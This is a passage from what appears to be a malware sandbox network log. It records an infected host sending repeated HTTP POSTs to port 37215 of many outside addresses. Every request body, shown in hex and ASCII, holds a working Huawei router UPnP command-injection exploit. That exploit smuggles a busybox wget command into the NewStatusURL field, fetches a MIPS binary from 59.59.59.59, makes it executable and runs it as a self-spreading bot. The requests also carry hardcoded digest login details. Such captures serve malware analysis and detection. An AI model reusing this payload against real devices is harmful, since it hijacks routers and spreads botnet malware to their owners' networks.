2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          433192.168.2.1558856135.31.11.3437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.574527025 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          434192.168.2.155074032.13.80.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.574584007 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          435192.168.2.1542018157.37.148.15337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.574978113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          436192.168.2.1552876197.85.167.5937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575000048 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          437192.168.2.154054241.177.144.537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575016975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:48.809905052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:49.241920948 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:50.105968952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:51.801790953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          438192.168.2.1551020110.212.71.1437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575076103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          439192.168.2.1556912197.193.226.2737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575129032 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
